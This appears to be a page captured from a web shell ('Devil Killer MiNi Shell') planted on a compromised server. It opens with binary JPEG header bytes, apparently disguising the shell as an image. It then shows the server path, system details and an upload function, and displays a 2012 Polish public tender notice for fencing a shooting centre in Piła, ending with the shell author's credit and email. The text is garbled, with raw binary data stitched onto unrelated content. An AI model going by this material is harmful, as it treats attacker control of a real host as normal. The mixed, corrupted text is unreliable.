JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120830/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120830/323102-N-2012.html

<p class="kh_header"><b>Piła: Centrum Strzelectwa Sportowego - ogrodzenie.</b><br>
<b>Numer ogłoszenia: 323102 - 2012; data zamieszczenia: 30.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Centrum Strzelectwa Sportowego - ogrodzenie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Centrum Strzelectwa Sportowego - ogrodzenie. 
Przedmiotem zamówienia jest wykonanie ogrodzenia wokół istniejącego Centrum Strzelectwa Sportowego Tarcza w Pile  
Opis przedmiotu zamówienia Zakres robót obejmuje: 
1.1  Wykonanie ogrodzenia typu A 
Ogrodzenie systemowe typu Legi Polska wykonać od strony południowej, gdzie graniczy z drogą wojewódzką  ul. Aleja Powstańców Wielkopolskich. Słupek z profilu 60x40x2mm o całkowitej wysokości 2700mm. Panel ogrodzeniowy 2D o wysokości 1800mm ocynkowany ogniowo, wykonany z drutów o nie mniejszych przekrojach niż: dwa pręty poziome 7mm oraz pręt pionowy 5mm. Oczka pomiędzy prętami wynoszą 50na200mm. Dolna krawędź panelu ogrodzeniowego zakończona będzie ze stykiem z prefabrykowaną podwaliną betonową wkopaną 10cm w grunt. Montaż paneli na zakładkę i całość jest dociskana profilem dociskowym 40-20-2mm. Słupek zasadniczy wraz z maskującym połączony za pomocą kapy systemowej mocowanej śrubą specjalną kodowaną .Odległość między słupkami to 250cm.  Fundamenty słupków mają wymiary 35-35-80cm. Na fundamencie należy wykonać podwalinę systemową  o wysokości 20 cm w tym 10 cm pod  gruntem.  Przewiduje się wykonanie dwóch bram wjazdowych: brama główna - 10,0m brama wjazdowa na parking - 6,0m. Rama bramy: Profil górny, tylny, i dolny - 80x80x3, profil czołowy - 100x80x3, wypełnienie - 30x20x3.Słupy: dojazdowy - 100x80x3, podwójny, przelotowy - 120x120x3, podwójny. Szczegóły w projekcie
1.2  Wykonanie ogrodzenia typu  B 
Ogrodzenie z siatki wykonać od strony północnej, jako ogrodzenie pojedyncze z siatki plecionej ocynkowanej  na słupkach stalowych ocynkowanych. Siatka pleciona o oczkach 60 x 60 mm (po zamontowaniu) w kształcie rombu z drutu ocynkowanego o średnicy min. 3,0mm. Siatka o wysokości 1750mm, słupki ogrodzeniowe okrągłe min. plus 50mm gr. 3 mm. Siatka mocowana w gruncie za pomocą szpilek na głębokości 15 cm co 1,0 m.. Siatkę mocować do linek - drutu naciągowego plus 3,0mm. Linki naprężyć napinaczami co 50 m, napinacze linek osadzić na słupkach wspornikowych (z podporami). Do słupków ogrodzeniowych mocować 3 rzędy drutu naciągowego w rozstawie co ok. 78cm.	
UWAGA: Napinacze, linki naciągowe, drut kolczasty, listwy i drut wiązałkowy powinny być ocynkowane ogniowo i powleczone proszkiem poliestrowym. Słupki przelotowe, wspornikowe i końcowe.
Słupki ogrodzeniowe stalowe w rozstawie co 2,5m o przekroju okrągłym plus 50 mm gr. 3 mm długości 260cm + zwyżka jako odkos o długości 50cm. W dolnej części słupka pręt zbrojeniowy plus 8 mm długości 20 mm a w górnej części odkos skierowany do wewnątrz omawianej działki pod kątem 45° przeznaczony do mocowania trzech rzędów drutu kolczastego. Słupki osadzić w fundamencie betonowym na gł. 90cm, licząc od poziomu terenu. Słupki betonowe 30x30x75cm wykonać z betonu C16łamane20. 
Słupek przelotowy tworzy pojedyncza rura stalowa zamontowana w fundamencie. Słupek wspornikowy montowany w odstępach max. co 10 słupek. Słupek tworzy pojedyncza rura stalowa (słupek przelotowy) z dodatkowymi dwoma wspornikami montowanymi do słupka za pomocą obejmy w 2łamane3 wysokości ponad gruntem. Dolna część wspornika montowana w fundamencie betonowym.
Słupek końcowy montowany na zakończeniu ogrodzenia. Słupek tworzy pojedyncza rura stalowa (słupek przelotowy) z dodatkowym jednym wspornikiem montowanym za pomocą obejmy w 2łamane3 wysokości ponad gruntem. Dolna część wspornika montowana w fundamencie betonowym.
Wsporniki wykonane z rur stalowych o przekroju okrągłym min. plus 50mm gr. 3 mm dł. W dolnej części wspornika pręt zbrojeniowy plus 8 mm długości 20 mm.
UWAGA: Słupki przelotowe, wsporniki oraz obejmy powinny być ocynkowane ogniowo.
Furtka o wysokości drzwi 180cm ze skosem i pionowymi na 2 rzędy drutami kolczastymi. Prześwit pionowy licząc od gruntu do poziomego drutu kolczastego wynosi 2,0m. Szerokość furtki wynosi 90cm.  Ramę furtki wykonac z ceowników 60x40x3mm. Furtkę wyposażyć w zamek.
UWAGA: Słupy, skrzydła furtki, wysięgniki i inne elementy furtki powinny być ocynkowane ogniowo.
Tablice ostrzegawcze. Na zewnątrz ogrodzenia należy zamontować tablice informacyjno-ostrzegawcze usytuowane przy bramie i na obu końcach ogrodzenia; Szczegóły w projekcie
1.3  Prace rozbiórkowe
Rozbiórka istniejącego ogrodzenia od strony  ul. Aleja Powstańców Wielkopolskich, oraz ogrodzenia murowanego z kamienia polnego. Szczegóły w projekcie.
1.4 Skuteczne zabezpieczenie terenu budowy
1.5 Wycinkę niżej wymienionych drzew, dokonanie w ich pobliżu nasadzeń zastępczych   oraz uwzględnienie następujących wytycznych 
1) Ścinanie mechaniczne drzew i krzewów na wskazanym  terenie
2) Mechaniczne karczowanie pni
3) Zebranie gałęzi karpiny w stosy
4) Zagospodarowanie karpiny i gałęzi we własnym zakresie przez Wykonawcę ( spalenie)
5) Dokonanie oceny przydatności drewna oraz wyliczenie ilości  drewna opałowego  pozyskanego  z wycinki przez osobę uprawnioną  (dokument dostarczyć do UM RFE)
6) Wywóz pociętych dłużyc na składowisko przy ul. Węglowej 9a w Pile ( dokument  przekazania podpisany przez przedstawiciela ZDiZ oraz Wykonawcę dostarczyć do UM  WRFE)
7) Dokonanie w pobliżu drzew wyciętych ( na działce 51na4)  nasadzeń zastępczych i w ilości wynikającej z  załączonej tabeli- nasadzenia roślin co najmniej 3 letnie
8) Pielęgnacja nasadzeń przez rok, w razie ubytków dokonanie uzupełnień
9) Wykonanie tymczasowego ogrodzenia zabezpieczającego nasadzone drzewa o wysokości  1,6 mb (siatka leśna na słupkach drewnianych); ilość drzew do wycinki i nasadzeń  została szczególowo określona w SIWZ
Przedmiot zamówienia określa projekt budowlano - wykonawczy wraz z Specyfikacją Techniczną Wykonania i Odbioru robót budowlanych stanowiące część SIWZ.
Zamawiający dołącza ponadto przedmiar prac do wykonania. Należy go traktować pomocniczo        w celu przygotowania wyceny
Wykonawca winien dołożyć najwyższej staranności w celu prawidłowego sporządzenia oferty, a zwłaszcza rzetelnego wyliczenia ceny oferty adekwatnej dla realizacji kompletnego przedmiotu zamówienia.  

Ponadto do obowiązków Wykonawcy należy:
1) zapewnienie pełnej obsługi geodezyjnej
2) przeprowadzenie wizji lokalnej na terenie realizacji zamówienia i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazanych w ramach niniejszego zamówienia przez Zamawiającego
3) wykonanie dokumentacji fotograficznej przed i po wykonaniu zadania oraz przekazanie jej Zamawiającemu na nośniku elektronicznym
4) wykonanie, dostarczenie i ustawienie na terenie placu budowy tablicy informacyjnej z logotypem Miasta Piły (wzór poglądowy w załączeniu). Tablica o wymiarach 2m na 1m zawierająca w treści tytuł zadania, wartość zadania w zaokrągleniu do liczb całkowitych. Wzór tablicy do uzgodnienia z Zamawiającym. Umocowanie stabilne na wysokość zapewniającą jej czytelność. Trwałość tablicy przez okres realizacji, do dnia odbioru końcowego. Koszt zrealizowania niniejszego punktu należy uwzględnić w tak zwanych kosztach ogólnych realizowanych robót.
5) wykonanie i dostarczenie Zamawiającemu (wraz ze spisem zawartości) w dniu zgłoszenia gotowości odbiorowej:                                                                                                
- inwentaryzacji geodezyjnej powykonawczej - 6 kpl
- pełnobranżowej dokumentacji powykonawczej - 2 kpl
- protokołów badań i sprawdzeń - 2 kpl
- instrukcji konserwacji ogrodzenia - 2 kpl 
- atestów i deklaracji zgodności na użyte materiały i sadzonki - 2 kpl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 01.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000,00 (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że  w okresie ostatnich 5 lat przed terminem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał  co najmniej dwa zadania w zakresie zgodnym z przedmiotem zamówienia, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, potwierdzone dokumentami np. referencjami na dowód że roboty wykazane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobą posiadającą doświadczenie i kwalifikacje odpowiednie do stanowiska, jakie zostanie mu  powierzone, spełniający poniższe wymagania:
kierownik robót - uprawnienia budowlane do kierowania robotami budowlanymi ; 1-roczne doświadczenie zawodowe po uzyskaniu uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)    Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie) - przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
b)    parafowany projekt  umowy  
c)    załącznik dotyczący podwykonawstwa
d)    kosztorys ofertowy (uproszczony) sporządzony wg wzoru stanowiącego załącznik do SIWZ
e)     dokument wniesienia wadium (potwierdzony za zgodność z oryginałem)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę okresu przewidzianego na ukończenie robót gdy wystąpią:
1) zmiany spowodowane warunkami atmosferycznymi odbiegającymi od typowych (niekorzystne), uniemożliwiające
    prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów.
    Przez niekorzystne warunki pogodowe rozumie się: 
    - wystąpienia w czasie dnia roboczego (7:00-16:00) intensywnych opadów deszczu przez 3 dni następujących
      jeden po drugim przy czym wystąpienie niekorzystnych warunków pogodowych winno być zgłoszone
      w dzienniku budowy oraz pisemnie Zamawiającemu  z potwierdzeniem przez Inspektora nadzoru a także
      stwierdzone zaświadczeniem najbliżej stacji meteorologicznej;
2) zmiany spowodowane nieprzewidzianymi warunkami realizacji, tj. warunkami geologicznymi, archeologicznymi
     lub terenowymi, w szczególności: wykopaliska archeologiczne, niewypały i niewybuchy, niezinwentaryzowane
     lub błędnie zinwentaryzowane obiekty budowlane;
3)  zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
     a) wstrzymanie robót przez Zamawiającego lub rezygnację przez Zamawiającego z realizacji części przedmiotu
        umowy;
    b) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji
         technicznej wykonania i odbioru robót;
     c) zmiany spowodowane koniecznością wykonania zamówienia dodatkowego, w rozumieniu przepisów o
         zamówieniach publicznych, którego realizacja będzie miała wpływ na termin wykonania przedmiotu umowy.
4)  kolizje z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami; W takim przypadku
      zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji;
5)  odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót
     warunki terenowe, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych
     obiektów budowlanych;
6) Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
    Zamawiający dopuszcza:
     a) zmianę osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy pod warunkiem uzyskania
         akceptacji Zamawiającego i spełnienia przez te osoby warunków SIWZ;
     b) zmianę umowy w zakresie podwykonawców, za uprzednią zgodą Zamawiającego, tj. możliwe
         powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy, a także
         możliwa zmiana podwykonawcy na etapie realizacji robót, o ile nie sprzeciwia się to postanowieniem
         SIWZ.
Każdy wniosek o zmianę zapisów umowy winien być przedłożony przez wykoanawcę pisemnie wraz z uzasadnieniem. Zmiana zapisów umowy może być przez Zamawiającego uznana wyłącznie w zakresie określonym w art. 144 ust. 1 ustwy pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2012 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  pietro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com